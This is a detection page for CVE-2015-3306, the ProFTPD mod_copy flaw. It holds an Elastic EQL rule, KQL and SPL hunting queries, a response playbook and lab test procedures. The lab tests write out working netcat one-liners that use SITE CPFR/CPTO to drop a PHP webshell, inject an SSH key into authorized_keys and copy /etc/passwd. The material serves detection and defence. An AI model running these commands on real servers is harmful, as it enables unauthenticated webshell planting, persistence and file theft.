CVE-2015-3306 Elastic Security · Elastic

Detect ProFTPD mod_copy Unauthenticated Remote Command Execution (CVE-2015-3306) in Elastic Security

Detects exploitation of CVE-2015-3306, an improper access control flaw in the mod_copy module of ProFTPD. The SITE CPFR and SITE CPTO commands are exposed without authentication, allowing a remote attacker to copy arbitrary files on the server. Attackers chain this with the PHP/SSH config to write attacker-controlled data (e.g., a webshell) into a web-accessible directory, achieving unauthenticated remote command execution. This detection looks for anonymous or unauthenticated use of SITE CPFR/CPTO sequences, copies that target web roots or authorized_keys files, and the follow-on execution indicative of a dropped webshell.

MITRE ATT&CK

Tactic
Initial Access Execution Lateral Movement

Elastic Detection Query

Elastic Security (Elastic)
eql
sequence by host.name with maxspan=2m
  [ any where message : "*SITE CPFR*" ]
  [ any where message : "*SITE CPTO*" and
      (message : "*/var/www*" or message : "*.php*" or message : "*authorized_keys*" or message : "*public_html*") ]
critical severity medium confidence

Correlates a SITE CPFR command followed by a SITE CPTO command targeting sensitive paths on the same host within two minutes — the mod_copy exploitation pattern.

Data Sources

Filebeat system moduleProFTPD log ingest

Required Tables

logs-system.syslog-*logs-*

False Positives & Tuning

  • Scripted copy operations from backup tooling
  • Deployment automation writing into web roots
  • Monitoring probes exercising SITE commands

Other platforms for CVE-2015-3306


Testing Methodology

Validate this detection against 3 adversary techniques from Atomic Red Team. Each test below lists the behaviour to exercise and the telemetry you should expect to see. Executable commands and cleanup steps are available with Pro.

  1. Test 1ProFTPD mod_copy webshell drop via SITE CPFR/CPTO

    Expected signal: ProFTPD SystemLog/TransferLog records containing 'SITE CPFR /tmp/shell.php' and 'SITE CPTO /var/www/html/shell.php'

  2. Test 2ProFTPD mod_copy SSH key injection

    Expected signal: FTP log entries showing SITE CPTO targeting an authorized_keys path

  3. Test 3ProFTPD SITE CPFR arbitrary file read

    Expected signal: FTP log entries showing SITE CPFR /etc/passwd followed by SITE CPTO


Response Playbook

Triage

  1. Confirm the ProFTPD version on the affected host (banner, `proftpd -v`, package manager) and whether mod_copy is loaded; versions at/before 1.3.5 and 1.3.6rc builds without the fix are vulnerable to CVE-2015-3306.
  2. Review the FTP session logs around the SITE CPFR/CPTO events to identify the source IP, whether the session was anonymous/unauthenticated, and the exact source and destination file paths that were copied.
  3. Inspect the copy destination (web root, public_html, or ~/.ssh/authorized_keys) for newly created or modified files — webshells, PHP backdoors, or injected SSH public keys.
  4. Correlate the FTP copy events with subsequent web-server access logs or shell process execution to determine whether the dropped payload was invoked.

Containment

  1. Block the attacker source IP(s) at the perimeter firewall and terminate any active FTP sessions from them.
  2. Disable or unload mod_copy and restrict SITE commands in proftpd.conf (`<Limit SITE_CPFR SITE_CPTO> DenyAll </Limit>`), then restart ProFTPD; patch or upgrade to a fixed ProFTPD release.
  3. Quarantine or remove any confirmed webshell/backdoor files and revoke injected SSH keys from authorized_keys.

Evidence Collection

  1. Preserve ProFTPD logs (TransferLog, SystemLog, xferlog) and syslog covering the CPFR/CPTO activity.
  2. Capture the dropped files (hash, timestamps, content) and the web-server access logs showing any invocation of the payload.
  3. Collect process, network connection, and auth logs from the host to document post-exploitation activity and attribute the source.

Escalation Criteria

  • !Escalate to incident response if a webshell or backdoor was confirmed written and subsequently executed (confirmed RCE).
  • !Escalate if the host is internet-facing, processes sensitive data, or shows signs of lateral movement or persistence (new accounts, injected SSH keys, cron jobs).

Investigation Guide

Related Techniques

Forensic Artifacts

  • >ProFTPD TransferLog/SystemLog entries showing SITE CPFR and SITE CPTO commands
  • >Newly created files in web-accessible directories (e.g., /var/www/html/*.php) with FTP-process ownership
  • >Modified ~/.ssh/authorized_keys files with unexpected public keys
  • >Web-server access-log entries invoking the dropped payload shortly after the FTP copy

Tuning Guidance

If legitimate backup or deployment automation uses SITE CPFR/CPTO, allowlist those specific source IPs or service accounts rather than disabling the rule. Narrow the destination-path regex to your actual web roots to reduce noise, and raise severity when the source session is anonymous/unauthenticated.


Hunting Queries

Surfaces hosts with paired SITE CPFR/CPTO activity over time to spot exploitation attempts even when destination paths are obfuscated.

Hunting — KQL
kql
Syslog | where SyslogMessage has_any ("CPFR","CPTO") | summarize count(), make_set(SyslogMessage) by HostIP, bin(TimeGenerated, 1h) | where count_ > 1
Hunting — SPL
spl
index=* ("CPFR" OR "CPTO") | stats count values(_raw) by host | where count>1

Atomic Red Team Tests

Test 1 ProFTPD mod_copy webshell drop via SITE CPFR/CPTO
linux

Uses an unauthenticated FTP session to copy a staged PHP webshell into the web root, reproducing CVE-2015-3306 exploitation in a lab.

Command

bash
printf 'USER anonymous\r\nSITE CPFR /tmp/shell.php\r\nSITE CPTO /var/www/html/shell.php\r\nQUIT\r\n' | nc 127.0.0.1 21

Cleanup

bash
rm -f /var/www/html/shell.php

Expected Telemetry

ProFTPD SystemLog/TransferLog records containing 'SITE CPFR /tmp/shell.php' and 'SITE CPTO /var/www/html/shell.php'

Expected Detection

KQL/SPL rules fire on the CPTO destination matching /var/www and .php

Test 2 ProFTPD mod_copy SSH key injection
linux

Copies an attacker public key into a user's authorized_keys via mod_copy to establish persistence.

Command

bash
printf 'SITE CPFR /tmp/attacker.pub\r\nSITE CPTO /home/ftpuser/.ssh/authorized_keys\r\nQUIT\r\n' | nc 127.0.0.1 21

Cleanup

bash
rm -f /home/ftpuser/.ssh/authorized_keys

Expected Telemetry

FTP log entries showing SITE CPTO targeting an authorized_keys path

Expected Detection

Rules match on CPTO destination containing 'authorized_keys'

Test 3 ProFTPD SITE CPFR arbitrary file read
linux

Demonstrates using SITE CPFR to stage a sensitive system file for exfiltration via a subsequent retrieve.

Command

bash
printf 'SITE CPFR /etc/passwd\r\nSITE CPTO /tmp/passwd.copy\r\nQUIT\r\n' | nc 127.0.0.1 21

Cleanup

bash
rm -f /tmp/passwd.copy

Expected Telemetry

FTP log entries showing SITE CPFR /etc/passwd followed by SITE CPTO

Expected Detection

Paired CPFR/CPTO hunting query flags the host; CPFR source referencing /etc/ matches the rule

Related Detections